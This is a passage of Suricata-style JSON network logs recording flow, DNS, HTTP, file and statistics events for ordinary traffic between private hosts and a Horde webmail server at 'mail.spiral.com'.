{"timestamp":"2020-02-29T00:03:39.000249+0000","flow_id":432102333557313,"event_type":"flow","src_ip":"192.168.10.130","src_port":34702,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1101,"bytes_toclient":4128,"start":"2020-02-29T00:02:33.535105+0000","end":"2020-02-29T00:02:38.758339+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:40.000465+0000","flow_id":484492329315239,"event_type":"flow","src_ip":"192.168.10.122","src_port":51089,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:39.486311+0000","end":"2020-02-28T23:58:39.597883+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:03:42.000363+0000","flow_id":1857713646178395,"event_type":"flow","src_ip":"192.168.10.130","src_port":34698,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":15,"pkts_toclient":23,"bytes_toserver":3176,"bytes_toclient":19569,"start":"2020-02-29T00:02:01.561243+0000","end":"2020-02-29T00:02:41.127250+0000","age":40,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:42.001453+0000","flow_id":273776938932889,"event_type":"flow","src_ip":"192.168.10.122","src_port":42956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:58:41.744089+0000","end":"2020-02-28T23:58:41.855799+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:03:44.000397+0000","event_type":"stats","stats":{"uptime":13876,"capture":{"kernel_packets":132957,"kernel_drops":0},"decoder":{"pkts":132959,"bytes":92170018,"invalid":180,"ipv4":131526,"ipv6":8,"ethernet":132959,"raw":0,"null":0,"sll":0,"tcp":126496,"udp":4836,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2684,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2700,"synack":2691,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1729,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2204,"failed_udp":108},"tx":{"http":4492,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2281}},"flow_mgr":{"closed_pruned":2663,"new_pruned":15,"est_pruned":2249,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20831,"memcap_state":0,"memcap_global":0},"http":{"memuse":45335,"memcap":0}}} 
{"timestamp":"2020-02-29T00:03:45.000693+0000","flow_id":667500901523119,"event_type":"flow","src_ip":"192.168.10.130","src_port":34704,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1130,"bytes_toclient":5052,"start":"2020-02-29T00:02:39.024239+0000","end":"2020-02-29T00:02:44.205454+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:47.000253+0000","flow_id":795211738668950,"event_type":"flow","src_ip":"192.168.10.122","src_port":48627,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:44.941974+0000","end":"2020-02-28T23:58:45.053386+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:47.001136+0000","flow_id":139224203776181,"event_type":"flow","src_ip":"192.168.10.122","src_port":55264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:45.118965+0000","end":"2020-02-28T23:58:45.230467+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:03:47.001351+0000","flow_id":612061463836783,"event_type":"flow","src_ip":"192.168.10.130","src_port":34706,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":1161,"bytes_toclient":7936,"start":"2020-02-29T00:02:41.129135+0000","end":"2020-02-29T00:02:46.724343+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:47.425157+0000","flow_id":106092845825221,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":45285,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29425,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:47.531143+0000","flow_id":106092845825221,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45285,"proto":"UDP","dns":{"type":"answer","id":29425,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:47.531143+0000","flow_id":106092845825221,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":45285,"proto":"UDP","dns":{"type":"answer","id":29425,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:47.578774+0000","flow_id":1754728927280743,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50}} {"timestamp":"2020-02-29T00:03:47.578774+0000","flow_id":1754728927280743,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:03:47.581795+0000","flow_id":1247342965809315,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48919,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31870,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:47.693010+0000","flow_id":1247342965809315,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48919,"proto":"UDP","dns":{"type":"answer","id":31870,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:47.693010+0000","flow_id":1247342965809315,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48919,"proto":"UDP","dns":{"type":"answer","id":31870,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:03:47.769072+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8786}} {"timestamp":"2020-02-29T00:03:47.819724+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8786},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":36714,"tx_id":0}} {"timestamp":"2020-02-29T00:03:47.821266+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/form_sections.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} 
{"timestamp":"2020-02-29T00:03:47.828479+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/form_sections.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/form_sections.js","state":"CLOSED","stored":false,"size":1723,"tx_id":1}} {"timestamp":"2020-02-29T00:03:47.829099+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517}} {"timestamp":"2020-02-29T00:03:47.830450+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/calendar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2517},"app_proto":"http","fileinfo":{"filename":"\/js\/calendar.js","state":"CLOSED","stored":false,"size":10335,"tx_id":2}} {"timestamp":"2020-02-29T00:03:47.847731+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/calendar.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":973}} {"timestamp":"2020-02-29T00:03:47.849620+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/calendar.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":973},"app_proto":"http","fileinfo":{"filename":"\/nag\/js\/calendar.js","state":"CLOSED","stored":false,"size":3052,"tx_id":3}} 
{"timestamp":"2020-02-29T00:03:47.893299+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/task.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":689}} {"timestamp":"2020-02-29T00:03:51.000241+0000","event_type":"stats","stats":{"uptime":13883,"capture":{"kernel_packets":132963,"kernel_drops":0},"decoder":{"pkts":133009,"bytes":92192150,"invalid":180,"ipv4":131576,"ipv6":8,"ethernet":133009,"raw":0,"null":0,"sll":0,"tcp":126542,"udp":4840,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2687,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2703,"synack":2694,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1731,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2206,"failed_udp":108},"tx":{"http":4498,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2283}},"flow_mgr":{"closed_pruned":2666,"n
ew_pruned":15,"est_pruned":2252,"bypassed_pruned":0,"flows_checked":7,"flows_notimeout":7,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65528,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20830,"memcap_state":0,"memcap_global":0},"http":{"memuse":74606,"memcap":0}}} {"timestamp":"2020-02-29T00:03:52.000305+0000","flow_id":1433087412423287,"event_type":"flow","src_ip":"192.168.10.130","src_port":34708,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1448,"bytes_toclient":5145,"start":"2020-02-29T00:02:46.215671+0000","end":"2020-02-29T00:02:51.772800+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:52.582941+0000","flow_id":1754728927280743,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34722,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":30,"tx_id":0}} 
{"timestamp":"2020-02-29T00:03:52.854906+0000","flow_id":374678625694270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52672,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/task.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":689},"app_proto":"http","fileinfo":{"filename":"\/nag\/js\/task.js","state":"CLOSED","stored":false,"size":1698,"tx_id":4}} {"timestamp":"2020-02-29T00:03:58.000296+0000","event_type":"stats","stats":{"uptime":13890,"capture":{"kernel_packets":133011,"kernel_drops":0},"decoder":{"pkts":133021,"bytes":92192846,"invalid":180,"ipv4":131584,"ipv6":8,"ethernet":133021,"raw":0,"null":0,"sll":0,"tcp":126550,"udp":4840,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2687,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2703,"synack":2694,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1731,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2206,"fail
ed_udp":108},"tx":{"http":4498,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2283}},"flow_mgr":{"closed_pruned":2667,"new_pruned":15,"est_pruned":2252,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":20830,"memcap_state":0,"memcap_global":0},"http":{"memuse":22938,"memcap":0}}} {"timestamp":"2020-02-29T00:03:59.357530+0000","flow_id":158826455069850,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":42601,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61359,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:59.469367+0000","flow_id":158826455069850,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42601,"proto":"UDP","dns":{"type":"answer","id":61359,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:59.469367+0000","flow_id":158826455069850,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":42601,"proto":"UDP","dns":{"type":"answer","id":61359,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:59.641684+0000","flow_id":223959634101441,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6896}} 
{"timestamp":"2020-02-29T00:04:00.084792+0000","flow_id":1832429181487928,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":47014,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62022,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:00.190190+0000","flow_id":1832429181487928,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47014,"proto":"UDP","dns":{"type":"answer","id":62022,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:00.190190+0000","flow_id":1832429181487928,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47014,"proto":"UDP","dns":{"type":"answer","id":62022,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:00.211063+0000","flow_id":290368418484945,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} 
{"timestamp":"2020-02-29T00:04:00.211063+0000","flow_id":290368418484945,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":11,"tx_id":0}} {"timestamp":"2020-02-29T00:04:02.000622+0000","flow_id":946128316031874,"event_type":"flow","src_ip":"192.168.10.130","src_port":34714,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1037,"bytes_toclient":4130,"start":"2020-02-29T00:02:56.680834+0000","end":"2020-02-29T00:03:01.884783+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:04:03.000848+0000","flow_id":835593022375949,"event_type":"flow","src_ip":"192.168.10.122","src_port":51967,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:02.231437+0000","end":"2020-02-28T23:59:02.339962+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:04:04.646765+0000","flow_id":223959634101441,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6896},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":35873,"tx_id":0}} {"timestamp":"2020-02-29T00:04:05.000201+0000","event_type":"stats","stats":{"uptime":13897,"capture":{"kernel_packets":133045,"kernel_drops":0},"decoder":{"pkts":133051,"bytes":92203990,"invalid":180,"ipv4":131614,"ipv6":8,"ethernet":133051,"raw":0,"null":0,"sll":0,"tcp":126576,"udp":4844,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2689,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2705,"synack":2696,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1733,"ftp":0,"smtp":0,"tls":761,"ssh":0